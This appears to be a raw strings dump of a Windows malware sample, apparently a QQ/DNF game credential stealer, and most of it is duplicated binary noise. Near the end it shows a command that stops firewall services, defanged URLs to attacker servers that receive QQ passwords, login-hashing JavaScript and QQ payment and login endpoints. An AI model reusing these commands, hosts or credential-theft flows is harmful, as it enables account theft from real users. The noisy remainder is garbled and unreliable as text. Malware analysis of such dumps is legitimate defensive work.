K%X[y
K%X[y
d,.PZ
d,.PZ
l.VSD{
l.VSD{
-zG}E
-zG}E
G.RUx
G.RUx
x
x
2A.ge
2A.ge
)O.cv-
)O.cv-
C%u*
C%u*
>%X6)TF3 Y
>%X6)TF3 Y
8.JY~(
8.JY~(
^.YUu
^.YUu
fTPQ
fTPQ
``.Bf
``.Bf
;J.HJ
;J.HJ
w%c?2b
w%c?2b
.mDelUk
.mDelUk
x.aH;T
x.aH;T
@ERG.UVp
@ERG.UVp
:.dbq
:.dbq
%xoH*
%xoH*
TFz.JY
TFz.JY
-F}I8
-F}I8
<.bld>
<.bld>
Q.eRm
Q.eRm
"%sR\
"%sR\
f [W.TM80
f [W.TM80
.Zqc)
.Zqc)
9o%0sR
9o%0sR
v.SYb
v.SYb
.zgWe
.zgWe
.eD)S
.eD)S
FD
FD
2*%Xu
2*%Xu
~.vi3x
~.vi3x
).uk;
).uk;
"SZ.YW
"SZ.YW
K/.Vj
K/.Vj
xSQl
xSQl
IB(%F
IB(%F
>C'%C
>C'%C
W-pg}
W-pg}
.Zp]~
.Zp]~
-Xf}=
-Xf}=
)%FtG
)%FtG
j?tcp
j?tcp
;8%U}hUv
;8%U}hUv
i.uC)F
i.uC)F
.bD(Ph
.bD(Ph
!..LA
!..LA
R\.VK
R\.VK
l1.PR
l1.PR
4,.Oc
4,.Oc
x{PGM%CM
x{PGM%CM
.bT%8
.bT%8
V=?{B%X,
V=?{B%X,
&j.xk
&j.xk
}Zn.tP
}Zn.tP
55.pS
55.pS
~.OAKgN
~.OAKgN
.ZUeJ
.ZUeJ
SO.zBQ
SO.zBQ
fYRÃ
fYRÃ
%UjsM
%UjsM
-m}l6
-m}l6
%2@U.Wp
%2@U.Wp
pQS%U
pQS%U
'5(.s)CRt{
'5(.s)CRt{
%CQQ3cp
%CQQ3cp
R5.rP
R5.rP
@p.WJ
@p.WJ
XF.fE
XF.fE
u.NJ%
u.NJ%
.pdB4
.pdB4
$z.QmmR
$z.QmmR
u%UtS
u%UtS
>,%c@
>,%c@
eaxt%x
eaxt%x
ApCmD
ApCmD
98.CA
98.CA
G.gLa
G.gLa
)%d*M
)%d*M
!.UVU
!.UVU
|.rGz
|.rGz
.yM85
.yM85
P/.Fy
P/.Fy
lY.iCFv
lY.iCFv
1.mW:f
1.mW:f
'YR.OFx
'YR.OFx
4z.OG
4z.OG
.mHZgp][
.mHZgp][
v^.Ng
v^.Ng
.AZZ#
.AZZ#
T}8%U
T}8%U
.xS%DgS
.xS%DgS
.cI@=
.cI@=
Tudp
Tudp
%D"A,
%D"A,
.qw4\
.qw4\
Xm.Hh
Xm.Hh
P~jÂg
P~jÂg
W@.IA
W@.IA
-.SAig~%
-.SAig~%
'.TH}q
'.TH}q
O.QB%~V
O.QB%~V
^.IC=
^.IC=
-56%FL
-56%FL
.zt?%
.zt?%
Do.EJ*
Do.EJ*
C.oMd
C.oMd
.oW$(
.oW$(
LE.AI
LE.AI
g.XB3(
g.XB3(
IM.RJ
IM.RJ
Ue.vz
Ue.vz
%C%*bq
%C%*bq
87(%c
87(%c
.EZ3xl
.EZ3xl
89VG%sOV>
89VG%sOV>
A%XYK
A%XYK
%Fv@4
%Fv@4
P{1%S@
P{1%S@
%X5r"
%X5r"
?n.UG
?n.UG
.kmDo
.kmDo
-D}F21
-D}F21
r.AUao
r.AUao
MÂU
MÂU
k".ci
k".ci
PNÃ
PNÃ
qEk.gGU
qEk.gGU
I732.jV
I732.jV
iK.EJ
iK.EJ
%sl13
%sl13
.cM6T
.cM6T
>.qrf
>.qrf
.EYpx
.EYpx
a!.fY
a!.fY
5.wJc
5.wJc
%U[y
%U[y
BTizU%s_t
BTizU%s_t
.JZszb6
.JZszb6
&"r%u
&"r%u
*}Vt%f
*}Vt%f
3J.jM
3J.jM
%F;]m
%F;]m
o.uy9
o.uy9
:{.dKWD
:{.dKWD
.Uf":j
.Uf":j
.DGD:
.DGD:
'*%x9
'*%x9
G|[o.nS
G|[o.nS
L.VN'
L.VN'
w 5Ã’
w 5Ã’
k;%xn
k;%xn
.TIu|9
.TIu|9
(S.be
(S.be
.ep&9
.ep&9
6s%FN*
6s%FN*
q:\u6
q:\u6
_Q.fB
_Q.fB
"%x"po
"%x"po
.kk0\
.kk0\
o.iSLB:
o.iSLB:
?zÿa
?zÿa
.OszT{
.OszT{
F.Zcq
F.Zcq
%DoBm
%DoBm
.S.sk
.S.sk
DO%Ug
DO%Ug
%DpJE>k
%DpJE>k
C;.CP~
C;.CP~
.QsXOXT(
.QsXOXT(
R.OHZ
R.OHZ
.AqcE)p
.AqcE)p
9..Zj
9..Zj
ik;%xp
ik;%xp
,.Qaw
,.Qaw
Ph8;%UW
Ph8;%UW
.ctC/
.ctC/
%F\ o
%F\ o
GN.QL
GN.QL
X.aX/
X.aX/
O.kCD
O.kCD
?o3%X
?o3%X
aY:p!%D
aY:p!%D
V.Tdf
V.Tdf
gZ%sQY
gZ%sQY
&.jY0
&.jY0
Q.kH0
Q.kH0
j!%Ub
j!%Ub
2B.hO
2B.hO
rp*Q%x~
rp*Q%x~
D.bKX.T
D.bKX.T
oG [.%u
oG [.%u
rs.bM~
rs.bM~
5vYt.gX
5vYt.gX
|.Aw)
|.Aw)
GAI.wg
GAI.wg
7b.Yc~Z.>
7b.Yc~Z.>
9.nQ=
9.nQ=
.fW~Zm
.fW~Zm
./.Xi
./.Xi
Wu.fE
Wu.fE
.Xc!7
.Xc!7
A5f;MsG\
A5f;MsG\
-3}&.
-3}&.
.sH#
.sH#
.IoEF3
.IoEF3
eÃR
eÃR
57 .wf\Z
57 .wf\Z
Qs^%c
Qs^%c
.txs12&
.txs12&
#o2%x
#o2%x
7@.ty9
7@.ty9
(u%uc
(u%uc
%Sb=h
%Sb=h
(sshD#
(sshD#
1%cJWc
1%cJWc
%.RiJ
%.RiJ
`w.drj
`w.drj
%D:g'M
%D:g'M
vMSG
vMSG
.WT;_
.WT;_
.MUy\
.MUy\
.Zpg8
.Zpg8
%fwV6
%fwV6
z.vV~YC3
z.vV~YC3
|Gn.rV^\2~
|Gn.rV^\2~
>ut.kv
>ut.kv
.Xlev
.Xlev
s.pMM
s.pMM
O=?%f/p~n
O=?%f/p~n
%SNRr
%SNRr
m}j/%D
m}j/%D
2fT.zU
2fT.zU
.lE$aG
.lE$aG
7\{%U
7\{%U
!.uT?u
!.uT?u
.iK3b
.iK3b
$^.XH
$^.XH
NON}8.gi
NON}8.gi
L.SOL
L.SOL
-a}E'
-a}E'
DaaW.Cf
DaaW.Cf
LEXE:7
LEXE:7
.pA-]\
.pA-]\
lWEB
lWEB
%FWz^a
%FWz^a
e%C`V
e%C`V
.CSO1t#
.CSO1t#
ul.dw7@JB
ul.dw7@JB
~z-n2.VGt
~z-n2.VGt
&a%SV/
&a%SV/
VC.akjt
VC.akjt
%cx/b
%cx/b
CRt}U
CRt}U
÷foM
÷foM
jGweB
jGweB
Y0%dY
Y0%dY
2`H.DK
2`H.DK
%uO/_
%uO/_
.Rp@b
.Rp@b
H.XOO:s,P
H.XOO:s,P
Y3.iw
Y3.iw
.NR1(>Rx
.NR1(>Rx
.gW?Uc
.gW?Uc
.jOMw
.jOMw
.SD$^
.SD$^
~rX%X=
~rX%X=
W7%Um
W7%Um
.PYWA
.PYWA
,4urL
,4urL
?Ru.wP
?Ru.wP
Jx@t.yJ
Jx@t.yJ
Y.Gph$
Y.Gph$
t=.FwL
t=.FwL
.Yr~3a
.Yr~3a
_.ku]9
_.ku]9
BR%.tY
BR%.tY
%x~'m!
%x~'m!
C`.wzd
C`.wzd
`S%s|B
`S%s|B
;ús1
;ús1
$.YVcJ
$.YVcJ
.fism
.fism
.YW`1
.YW`1
.sTF(
.sTF(
k%.bs
k%.bs
0.XW~-p
0.XW~-p
C6.ET
C6.ET
".qZ)
".qZ)
O*Iu-.iC
O*Iu-.iC
.kb"]
.kb"]
u.Wo-
u.Wo-
=&cZ8.rP
=&cZ8.rP
MÚz
MÚz
v#.qG
v#.qG
,-9}!@*
,-9}!@*
yo%s
yo%s
{.pK8P
{.pK8P
%DZxN
%DZxN
.NpDD
.NpDD
%XS Jc
%XS Jc
.sju_h
.sju_h
>.WRV
>.WRV
.mKTj
.mKTj
.yd
.yd
}~q2%U
}~q2%U
cs.lvd
cs.lvd
Ul
Ul
MzcGk%D
MzcGk%D
&7#\.RY
&7#\.RY
iM.Wx
iM.Wx
G.bUdX Nb"
G.bUdX Nb"
4!N%c#
4!N%c#
%xS%Z
%xS%Z
T.oJ.
T.oJ.
.ig7ij
.ig7ij
7Y.Yfn
7Y.Yfn
Uls%U
Uls%U
Fbu.MT
Fbu.MT
".lA=
".lA=
,CMdx
,CMdx
-/iS#~%S
-/iS#~%S
h%u=9l
h%u=9l
t4%Xd
t4%Xd
U*.YT
U*.YT
yJOiNl
yJOiNl
}_KeY~
}_KeY~
M8%X{u
M8%X{u
a%X&a
a%X&a
_(|.eK*
_(|.eK*
G0.sBHg
G0.sBHg
?9sql$
?9sql$
^.bIT
^.bIT
6.nHP
6.nHP
.UP-%IA
.UP-%IA
[z%dm
[z%dm
l#f.PiOY
l#f.PiOY
M_%UZ
M_%UZ
%DG?L
%DG?L
%xb@n3kX
%xb@n3kX
X'X%uT
X'X%uT
.PSf]
.PSf]
4^X.xc
4^X.xc
k4.dw
k4.dw
%C@njx
%C@njx
.wL7#
.wL7#
.Xs~TI
.Xs~TI
7Fj.KHM
7Fj.KHM
Ën 0,_
Ën 0,_
hyID%u
hyID%u
keys
keys
c;<.ffm>
c;<.ffm>
n.pZh
n.pZh
vQ%CP
vQ%CP
4?%dSfM
4?%dSfM
n%dXA h5r
n%dXA h5r
.USi*
.USi*
!n.pT
!n.pT
^.bdx
^.bdx
u.Yn X
u.Yn X
@$.vM
@$.vM
egSD%S
egSD%S
.dRh=
.dRh=
BCrT
BCrT
Mr.ag
Mr.ag
DZc%u
DZc%u
9
9
d.tU(
d.tU(
.uA10
.uA10
[IP%X
[IP%X
e.nE]
e.nE]
)1.fU
)1.fU
|.GLK
|.GLK
FY.QZPV
FY.QZPV
;.%u\-ib
;.%u\-ib
#S.WB
#S.WB
V>:%fP
V>:%fP
8.jW
8.jW
.ec?fp^M
.ec?fp^M
.Ppe@
.Ppe@
0%uF,
0%uF,
( -D}{
( -D}{
.GezD8
.GezD8
Mr.EF
Mr.EF
.INlo
.INlo
WEBvV
WEBvV
.mFe,
.mFe,
?:ftP
?:ftP
%CM36
%CM36
ðnyVI
ðnyVI
.qE#h
.qE#h
9.mt>:
9.mt>:
?n2.Mymj
?n2.Mymj
E%xbB>
E%xbB>
%5x1Ei
%5x1Ei
"|.Ll
"|.Ll
G.IU/
G.IU/
ûhl;Q
ûhl;Q
a.mYX4
a.mYX4
X^.FkJ
X^.FkJ
q={%u
q={%u
%UdM)
%UdM)
B9)l.emk7
B9)l.emk7
s.aT`Y
s.aT`Y
%.Xd'
%.Xd'
7.Vxn
7.Vxn
W:\We2
W:\We2
&!%Sf
&!%Sf
\M:`.cS
\M:`.cS
u i%S
u i%S
;(.FA
;(.FA
l:\i7f
l:\i7f
I%0x
I%0x
%UXC-j;!6
%UXC-j;!6
(.HAp-
(.HAp-
87.Rfu
87.Rfu
%DT.$Y
%DT.$Y
cGT".Xd
cGT".Xd
o>.soO
o>.soO
.eRN)i
.eRN)i
Q7.Iu}0
Q7.Iu}0
k#%cS
k#%cS
?P'zu}O%D%
?P'zu}O%D%
Np%Xg
Np%Xg
b.DA&
b.DA&
`|.BB
`|.BB
.MoeCDk$
.MoeCDk$
$.RG,
$.RG,
rE)n=%s
rE)n=%s
.KGbk
.KGbk
(.nw:
(.nw:
-%2T%c
-%2T%c
iS%x9
iS%x9
.jZvW
.jZvW
\QeXe
\QeXe
/}.uz
/}.uz
.wK5M
.wK5M
.fjMu/0
.fjMu/0
O~c.bw6.
O~c.bw6.
'.nt-
'.nt-
.aNV.GF;
.aNV.GF;
udw%U
udw%U
}%S0X8t
}%S0X8t
~
~
5f@%f
5f@%f
nh%Dp6
nh%Dp6
!.uHn
!.uHn
.rPml
.rPml
%dyv2N.
%dyv2N.
.FxOl
.FxOl
&.zy:
&.zy:
y .XC
y .XC
.pm/-
.pm/-
6.neXb
6.neXb
<_.ew>
<_.ew>
.XP0.'
.XP0.'
v6.klT
v6.klT
#[w.xD
#[w.xD
{.Waf>aR
{.Waf>aR
%X)Ä
%X)Ä
Z{%f/
Z{%f/
.Om*U2
.Om*U2
.pQGF
.pQGF
%Fre&
%Fre&
".jF
".jF
m8Z%sO
m8Z%sO
K6.zz
K6.zz
3.SPn(4w
3.SPn(4w
-GUe.zu
-GUe.zu
wK.xA
wK.xA
Z.HZ&
Z.HZ&
K/%sK
K/%sK
.dtC#J
.dtC#J
;sqld
;sqld
q.HFN
q.HFN
)3.Jd
)3.Jd
}TZ%.D
}TZ%.D
*[KeyW6N#
*[KeyW6N#
?%u4D
?%u4D
&D!Yn %cg
&D!Yn %cg
.JhzJ\R[
.JhzJ\R[
%f{1
%f{1
%fMZ&
%fMZ&
CúW
CúW
zf"@.hx)
zf"@.hx)
.HReM
.HReM
]].tn
]].tn
.Lpj7M
.Lpj7M
%F fC
%F fC
.thm|SB
.thm|SB
N2%ukW:
N2%ukW:
wp%ct
wp%ct
9E.BC
9E.BC
V.pO0M
V.pO0M
.rWYn
.rWYn
c%sNy
c%sNy
t.EMw0
t.EMw0
.xU#J
.xU#J
d/%fN
d/%fN
%S3ni)
%S3ni)
.wb`c4I
.wb`c4I
`.TJi
`.TJi
.vAIa
.vAIa
XC.av
XC.av
2~%U_
2~%U_
JZ.Vz
JZ.Vz
6O.puR
6O.puR
EÔ@
EÔ@
\O.WX(
\O.WX(
4õ)z
4õ)z
^Q %S
^Q %S
.kOTD
.kOTD
.lgWH
.lgWH
IÓy
IÓy
.JA1SN
.JA1SN
%cO,WS!%;
%cO,WS!%;
.lfZ@
.lfZ@
Y;%F'
Y;%F'
2.JeI
2.JeI
&t.Yw
&t.Yw
9-mNc}
9-mNc}
NuDP
NuDP
uDplm
uDplm
Y(%F=
Y(%F=
m.Ey,]
m.Ey,]
.COow
.COow
v2.NP
v2.NP
@*5%x
@*5%x
Mr@B.lsN
Mr@B.lsN
:B2|%ut
:B2|%ut
E,9NT%So
E,9NT%So
`.OzI
`.OzI
d%UWG
d%UWG
?t-P}.
?t-P}.
{b.BK
{b.BK
D%Xm"
D%Xm"
rKc%s?
rKc%s?
_M%SF
_M%SF
ut-f}
ut-f}
cHs.qW
cHs.qW
e:\-drxP:4
e:\-drxP:4
{M.aD
{M.aD
GCmDF
GCmDF
tCPuv
tCPuv
Hx#%x
Hx#%x
.WQ3 1AT
.WQ3 1AT
V.Uj-a
V.Uj-a
& .AL
& .AL
.vYUPw
.vYUPw
Q#\.Pt
Q#\.Pt
yoQN.rB
yoQN.rB
]}T%C'oC
]}T%C'oC
-.lhA
-.lhA
C^.AX%
C^.AX%
2%I%c
2%I%c
%xKyB
%xKyB
;b=Å’
;b=Å’
f.DBq
f.DBq
sm%Um
sm%Um
E:\#6
E:\#6
%d_i{
%d_i{
);%xl
);%xl
.dDG_I
.dDG_I
Aj.xs
Aj.xs
.DX{YV
.DX{YV
..z.Zb
..z.Zb
e?.RZ
e?.RZ
BR2Z.INpW
BR2Z.INpW
ZF.LH
ZF.LH
k%s.9/
k%s.9/
2
2
.dy.jkt
.dy.jkt
e:\.;
e:\.;
%F=@-
%F=@-
c.ctZ
c.ctZ
waL.DIz
waL.DIz
.BO R
.BO R
H"B%S
H"B%S
.wAqD
.wAqD
>rl .JMTG
>rl .JMTG
r%X~eg
r%X~eg
$6L.oiTJ
$6L.oiTJ
n%u4$
n%u4$
OE.jl
OE.jl
l6.rD
l6.rD
w}sqLQ
w}sqLQ
*0e3.uix
*0e3.uix
t/.aq9
t/.aq9
.CL5h
.CL5h
ZiC!F.NQ
ZiC!F.NQ
ki-G}
ki-G}
O.vdxj*S
O.vdxj*S
C9D.aN7&
C9D.aN7&
U:V%D
U:V%D
%FZ= K
%FZ= K
ZvL.Hs
ZvL.Hs
.wnJ\
.wnJ\
g
g
&%cG.
&%cG.
GD.hv
GD.hv
$>_%s
$>_%s
o#.ZJ]
o#.ZJ]
N>.cUX
N>.cUX
="u2%X}v
="u2%X}v
.EM{,
.EM{,
Jo.zMJ
Jo.zMJ
h.yqr
h.yqr
-as4}
-as4}
Ux
Ux
.ED%c
.ED%c
új=
új=
H\ 7%U
H\ 7%U
3q1%F
3q1%F
g-n%x
g-n%x
"2K.mE
"2K.mE
X%.ip]k
X%.ip]k
.KXz#
.KXz#
.aEf=
.aEf=
bB/%x@
bB/%x@
AG.ZR
AG.ZR
.xLsf
.xLsf
.wg8R
.wg8R
{dn.Py
{dn.Py
l6ú$
l6ú$
\uyT.sYr
\uyT.sYr
n.grm
n.grm
b.qtq
b.qtq
k]%Xvi
k]%Xvi
.BK1z$
.BK1z$
3[%F%
3[%F%
@.vu?0
@.vu?0
kWG.EQ
kWG.EQ
>\.hmU
>\.hmU
.jivI
.jivI
Eh.gS
Eh.gS
.=^.KJ
.=^.KJ
56%Du
56%Du
8.QN6
8.QN6
`d%S\h
`d%S\h
%X(J5
%X(J5
`.DJp
`.DJp
kBL%D
kBL%D
.ugZ6
.ugZ6
l81%F
l81%F
T%sB$
T%sB$
2t8.gc
2t8.gc
'.CP_
'.CP_
3~.MAnW
3~.MAnW
.rs>m
.rs>m
SZl%X
SZl%X
h%DmT)_
h%DmT)_
}.EL[
}.EL[
j=.hD^
j=.hD^
CRTz
CRTz
M( %C
M( %C
k"|wEb
k"|wEb
B.IF(0
B.IF(0
N@L%U
N@L%U
.GO1EH
.GO1EH
%clW!
%clW!
q$exe
q$exe
yl$.Lm
yl$.Lm
-g5%u
-g5%u
u \%X
u \%X
TG#.hz*r
TG#.hz*r
63n%c/
63n%c/
5.oY{
5.oY{
:.Sha
:.Sha
H]..vYA
H]..vYA
*T%?.ys
*T%?.ys
Hm.vF
Hm.vF
)^.gI
)^.gI
lqK.Wl
lqK.Wl
'.Wg2XN
'.Wg2XN
]Q%ScF
]Q%ScF
QW.SB
QW.SB
r.fAZ
r.fAZ
p .sf
p .sf
-H}_s
-H}_s
|O:%D!
|O:%D!
.gjNPK
.gjNPK
m0F?3u{#,%X
m0F?3u{#,%X
-wa}o
-wa}o
%F |J
%F |J
5.Oen
5.Oen
)Bv%c
)Bv%c
GN{%C(h0
GN{%C(h0
C.UDgo
C.UDgo
=$.mz
=$.mz
u>"%f/
u>"%f/
4eA%D
4eA%D
C6.yz
C6.yz
o.AHvyA
o.AHvyA
IM%%x6
IM%%x6
YCH.EL
YCH.EL
cSfq&%x'
cSfq&%x'
r.RR8
r.RR8
-.VA%
-.VA%
d EXe
d EXe
%DQ Ki
%DQ Ki
XyGG|`Zc.Hu&
XyGG|`Zc.Hu&
Ty.zg\
Ty.zg\
Q.tSF&
Q.tSF&
,.HTbH
,.HTbH
76e&%X
76e&%X
>rd.yo =b
>rd.yo =b
J&.tI
J&.tI
o:.TU
o:.TU
h%FP(
h%FP(
P.fNu
P.fNu
6%xhf
6%xhf
R@.Tf5w
R@.Tf5w
.od$"
.od$"
FTP8f35E\5
FTP8f35E\5
.fknk
.fknk
D&%XB
D&%XB
q.sG4
q.sG4
$A4i.rK2k
$A4i.rK2k
Qi.nnS
Qi.nnS
C}.BC
C}.BC
7mSgf
7mSgf
S
S
=Gc7:5R.od>D
=Gc7:5R.od>D
& r%s
& r%s
&C%s;
&C%s;
fK.ue
fK.ue
k-bF}i
k-bF}i
6.ifl
6.ifl
O%xBs
O%xBs
&-0};d*w
&-0};d*w
W%d,D&
W%d,D&
%FK9RZ
%FK9RZ
.PfyT
.PfyT
%D}&zP
%D}&zP
v.Pg&
v.Pg&
l:z`.ya
l:z`.ya
!E.FsM
!E.FsM
Ip.XF
Ip.XF
D%xUz
D%xUz
d6.NOX
d6.NOX
%D)%^";"(|
%D)%^";"(|
%FS?h.
%FS?h.
I$DAn.zU
I$DAn.zU
?)%fW
$0A%u2
$0A%u2
2qep%U
2qep%U
.lne`
.lne`
.UGC9
.UGC9
.OYXjM
.OYXjM
[.kk8"
[.kk8"
_%XAA
_%XAA
)v.Fqm
)v.Fqm
tP"%dK
tP"%dK
}h.aen
}h.aen
)=.JB
)=.JB
E.krs
E.krs
%S;]NDA
%S;]NDA
vË8
vË8
@.zP*m
@.zP*m
LCb&w%Sh
LCb&w%Sh
lc.Lj;
lc.Lj;
.fMnjVwA8Ve
.fMnjVwA8Ve
)%C::x
)%C::x
-D}Ba
-D}Ba
w.oyr,
w.oyr,
w.BL$
w.BL$
'u%Xioc
'u%Xioc
J0.Wn
J0.Wn
.pHe7xP3
.pHe7xP3
I%X}-4
I%X}-4
?.lP"
?.lP"
.Jfrr
.Jfrr
z%X[G
z%X[G
u.jG'
u.jG'
.MdBF
.MdBF
u;|WJ%Ud$`
u;|WJ%Ud$`
-s}k'
-s}k'
%uwY6
%uwY6
.Dzew
.Dzew
}/}.zd
}/}.zd
]0%sH'
]0%sH'
5B%FX
5B%FX
!%snD
!%snD
?.eQy
?.eQy
Z(.lV
Z(.lV
Q`k%d
Q`k%d
,.mi0
,.mi0
~_.fK
~_.fK
\.mkS
\.mkS
W%U35
W%U35
.DyT'
.DyT'
i.yxd
i.yxd
.GR$j
.GR$j
7.FB2
7.FB2
,.YI}
,.YI}
.Moj,
.Moj,
.ENMo
.ENMo
\sM.CJ
\sM.CJ
m.rRm/_
m.rRm/_
HaK.Gp
HaK.Gp
>Ut.zZ4p
>Ut.zZ4p
=T.NC
=T.NC
x5.wMKic&D
x5.wMKic&D
Ap=wv/'~.Ac
Ap=wv/'~.Ac
b%CTr
b%CTr
wEbq
wEbq
k8.fs
k8.fs
S>D%cM@
S>D%cM@
P e.ns
P e.ns
cc.Lcr
cc.Lcr
xC.sP
xC.sP
!.HT]
!.HT]
.OOIs
.OOIs
.MSEq.
.MSEq.
.db]gV
.db]gV
%S1uM
%S1uM
>4Zs.Mg
>4Zs.Mg
.lzHe
.lzHe
x%S=qg
x%S=qg
3*.Ilu
3*.Ilu
.ovue
.ovue
*.jd9b
*.jd9b
Xx.Ce.
Xx.Ce.
3.SZd
3.SZd
/.ezv
/.ezv
`aI%uk
`aI%uk
O.iGK
O.iGK
pA/\5.XE
pA/\5.XE
nS%cq
nS%cq
8Z.XS1
8Z.XS1
>..Li
>..Li
.rWVj
.rWVj
.Ls9r
.Ls9r
[wi.ls7
[wi.ls7
p .XX
p .XX
)7.iQkb
)7.iQkb
hS].qp
hS].qp
[Ch.fCR
[Ch.fCR
I:>0`%F
I:>0`%F
,(3%u
,(3%u
p.QG~h
p.QG~h
%FQL6
%FQL6
%UJ3{
%UJ3{
%uA1"Vz
%uA1"Vz
U:{.bZ
U:{.bZ
.QnJg
.QnJg
.oNmV
.oNmV
#pTB-X}U
#pTB-X}U
{^V%d
{^V%d
c2@%xb
c2@%xb
5.RF0
5.RF0
\c.vfn
\c.vfn
8P.YKI
8P.YKI
? -\*:\>
? -\*:\>
$SQl'g
$SQl'g
$%c 4
$%c 4
TCPg
TCPg
%d'KX))8$
%d'KX))8$
/4k.hh;
/4k.hh;
)4.KM>
)4.KM>
`>%S~6
`>%S~6
.az2?>
.az2?>
b.TtF
b.TtF
a*[L%dR
a*[L%dR
~0.er
~0.er
G5.jo,!
G5.jo,!
q.bj>
q.bj>
Hq%FR
Hq%FR
H%U6u
H%U6u
Ob%Xc
Ob%Xc
o.hWB(
o.hWB(
<.uri>
<.uri>
.lN5B
.lN5B
V\.CS
V\.CS
Urld
Urld
&.cgow:>S$
&.cgow:>S$
yC.vI
yC.vI
.Vwx^4
.Vwx^4
eH.WD
eH.WD
sV-b}
sV-b}
ÃŒQ4
ÃŒQ4
^${.Nvf
^${.Nvf
.pk1G
.pk1G
.Ulhs
.Ulhs
S.Nla
S.Nla
1, 0, 0, 1
1, 0, 0, 1
AliIM.exe
AliIM.exe
FprqlspZxc.EXE_1288:
`.rsrc
`.rsrc
f9z.vk
f9z.vk
cmd /c net stop alg /y&net stop sharedaccess
cmd /c net stop alg /y&net stop sharedaccess
hXXp://183.57.57.192:7890/QQ/QQfm.txt
hXXp://183.57.57.192:7890/QQ/QQfm.txt
smqqv0.6hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
smqqv0.6hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
http=
HTTP/1.1
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXp://
hXXp://
hXXp://183.57.57.192:7890/QQ/dsm.txt&s_url=http://dnf.qq.com/act/a20090219dltb/&f_url=&ptlang=2052&ptredirect=101&aid=21000127&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0
hXXp://183.57.57.192:7890/QQ/dsm.txt&s_url=http://dnf.qq.com/act/a20090219dltb/&f_url=&ptlang=2052&ptredirect=101&aid=21000127&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0
&service=login&nodirect=0&ptsig=
&service=login&nodirect=0&ptsig=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
hXXp://183.57.57.192:7890/QQ/d2.txt&Beta=0.155&Ques=
hXXp://183.57.57.192:7890/QQ/d2.txt&Beta=0.155&Ques=
&Pass=
&Pass=
hXXp://183.57.57.192:7890/QQ/ljxiazaidizhi.txt
hXXp://183.57.57.192:7890/QQ/ljxiazaidizhi.txt
(7),01444
(7),01444
'9=82<.342>
'9=82<.342>
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=dnf&area=
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=dnf&area=
&msg=
&msg=
183.57.57.192
183.57.57.192
hXXp://183.61.164.199:989/grqif3/qq.asp
hXXp://183.61.164.199:989/grqif3/qq.asp
hXXp://captcha.qq.com/getimage?aid=11000101&uin=
hXXp://captcha.qq.com/getimage?aid=11000101&uin=
&_=139763802
&_=139763802
hXXp://my.pay.qq.com/cgi-bin/account/ajax_query.cgi?cmd=31&extcode=
hXXp://my.pay.qq.com/cgi-bin/account/ajax_query.cgi?cmd=31&extcode=
Adodb.Stream
Adodb.Stream
@hXXp://aq.qq.com/cn2/index
@hXXp://aq.qq.com/cn2/index
hXXp://my.pay.qq.com/cgi-bin/personal/balance_query_sortflow.cgi?t=0.
hXXp://my.pay.qq.com/cgi-bin/personal/balance_query_sortflow.cgi?t=0.
hXXp://183.57.57.192:7890/QQ/QQh.txt
hXXp://183.57.57.192:7890/QQ/QQh.txt
hXXp://183.57.57.192:7890/QQ/hmsx2.txt&aid=21000127&u1=http://dnf.qq.com/act/a20090219dltb/&h=1&ptredirect=1&ptlang=2052&daid=8&from_ui=1&dumy=&low_login_enable=0®master=&fp=loginerroralert&action=16-116-1389436820937&mibao_css=&t=2&g=1&js_ver=10063&js_type=1&login_sig=knHhTNFwQthq*GSFdpsyF6EaS8*jMteBFqJBsJiCmMR8bkYQuLD6LJlF-7k4h0Qx&pt_rsa=0
hXXp://183.57.57.192:7890/QQ/hmsx2.txt&aid=21000127&u1=http://dnf.qq.com/act/a20090219dltb/&h=1&ptredirect=1&ptlang=2052&daid=8&from_ui=1&dumy=&low_login_enable=0®master=&fp=loginerroralert&action=16-116-1389436820937&mibao_css=&t=2&g=1&js_ver=10063&js_type=1&login_sig=knHhTNFwQthq*GSFdpsyF6EaS8*jMteBFqJBsJiCmMR8bkYQuLD6LJlF-7k4h0Qx&pt_rsa=0
hXXp://ptlogin2.qq.com/login?u=
hXXp://ptlogin2.qq.com/login?u=
hXXp://ui.ptlogin2.qq.com/cgi-bin/mibao_vry
hXXp://ui.ptlogin2.qq.com/cgi-bin/mibao_vry
hXXp://aq.qq.com/cn/services/abnormal/abnormal_index
hXXp://aq.qq.com/cn/services/abnormal/abnormal_index
&s_url
&s_url
var hexcase=1;var b64pad="";var chrsz=8;var mode=32;function md5(A){return hex_md5(A)}function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128>>9)16){E=core_md5(E,C.length*chrsz)}var A=Array(16),D=Array(16);for(var B=0;B>16) (D>>16) (C>>16);return(B>>(32-B))}function str2binl(D){var C=Array();var A=(1>5]|=(D.charCodeAt(B/chrsz)&A)>5]>>>(B2))&A)}return D}function binl2hex(C){var B=hexcase?"0123456789ABCDEF":"0123456789abcdef";var D="";for(var A=0;A>2]>>((A%4)*8 4))&15) B.charAt((C[A>>2]>>((A%4)*8))&15)}return D}function binl2b64(D){var C="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /";var F="";for(var B=0;B>2]>>8*(B%4))&255)>2]>>8*((B 1)%4))&255)>2]>>8*((B 